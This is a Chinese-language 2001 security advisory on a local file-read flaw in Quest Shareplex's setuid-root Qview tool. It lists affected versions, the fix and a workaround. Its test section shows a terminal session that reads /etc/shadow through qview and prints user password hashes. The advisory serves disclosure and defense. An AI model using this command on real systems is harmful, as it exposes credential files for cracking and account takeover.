发布日期：2001-04-09
更新日期：2001-04-09

受影响系统：

Quest Shareplex 2.2.2 beta
       - Sun Solaris 2.6
       - HP HP-UX 11.0
       - HP HP-UX 10.20
    Quest Shareplex 2.1.3.9
       - Sun Solaris 2.6
       - HP HP-UX 11.0
       - HP HP-UX 10.20

不受影响系统：

    Quest Shareplex 2.1.3.21
       - Sun Solaris 2.6
       - IBM AIX 3.0x
       - HP HP-UX 11.0
       - HP HP-UX 10.20
       - Digital OSF/1 4.0
          - Sun Solaris 2.6
          - IBM AIX 3.0x
          - HP HP-UX 11.0
          - HP HP-UX 10.20

描述：

---

Shareplex 是 Quest Software开发的数据库复制工具。某些版本的Shareplex存在安
全漏洞，使得本地普通用户可以读取任意文件。

Shareplex 携带了一个命令 Qview，它允许用户指定一个本地文件作为Qview命令输
入，如果该命令文件所包含的内容不是有效的Qview命令，将在标准错误输出上显示
该文件内容。由于Qview是suid-to-root了的，显然本地攻击者可以利用这个缺陷读
取任意本地文件，包括/etc/shadow。

该漏洞潜在导致本地安全性能的极大损害。

<* 来源：Dixie Flatline (echo8@gh0st.net) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ id
    uid=500(foo) gid=200(bar)
    $ cd <path to shareplex binaries>
    $ ./qview
    qdump> cmd /etc/shadow
    Executing: root:xDmyz1K9xRKRo:11236::::::
    invalid command root:xDmyz1K9xRKRo:11236::::::
    ...
    Executing: splex:BdJCfh1D32hzo:11290::::::
    invalid command splex:BdJCfh1D32hzo:11290::::::
    Executing: foo:2MQXUgAcnOcEU:11344::::::
    invalid command foo:2MQXUgAcnOcEU:11344::::::
    qdump> quit
    $



建议：

---

临时解决方案是修正Qview命令的权限设置，去掉suid-to-root设置。
    SharePlex 2.1.3.21及其以上版本已经修正了该问题。


浏览次数：4747
严重程度：0（网友投票）